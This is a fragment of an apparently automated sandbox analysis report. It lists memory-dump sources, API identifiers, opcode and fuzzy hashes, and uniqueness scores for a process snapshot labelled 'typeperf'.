                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction ID: 5eec50810f3fcced4b1d46508efb1c0b12e6a592b9b757bbe97cfe61b62e9370
                                                                                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                        • Instruction Fuzzy Hash: 009185B4E0221A9FDB64DE69C8817BEB7FDFF46B20F18455AE865E72C0D73099408750
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 9792776dc763e27a1f04289e75e6b93d45f9f57f0ac0e5a8ef2e762c2d2bafc7
                                                                                                                        • Instruction ID: cb51a30c5146f2570b9c85093b1a43b7e14c603307f890d998147f4c3a091c37
                                                                                                                        • Opcode Fuzzy Hash: 9792776dc763e27a1f04289e75e6b93d45f9f57f0ac0e5a8ef2e762c2d2bafc7
                                                                                                                        • Instruction Fuzzy Hash: 7D815C75D012699BDB31DF54CC44BEEB7B8AF48750F0045EAAA19B7290E7705E84CFA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0307CFBD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.3839683325.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030E9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.00000000030ED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000006.00000002.3839683325.000000000315E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2fc0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                        • Opcode ID: 0dfcacd5d8a8830271ce0057aaac3fcee705a11a6bb5788382692ae29d35b669
                                                                                                                        • Instruction ID: 443e9740cfc9ee3cc422cc1a4135c9d8d4d3618cbae05b77488be3bd8fe6565e
                                                                                                                        • Opcode Fuzzy Hash: 0dfcacd5d8a8830271ce0057aaac3fcee705a11a6bb5788382692ae29d35b669
                                                                                                                        • Instruction Fuzzy Hash: A841BDB5E02218DFDB21DFA4D840AAEBBF8EF85B00F04446AE915DF254D734D941CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%